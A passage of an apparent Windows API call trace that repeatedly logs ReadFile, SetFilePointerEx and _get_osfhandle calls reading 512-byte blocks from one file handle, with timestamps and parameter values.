SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.786] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.787] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.789] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.790] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: 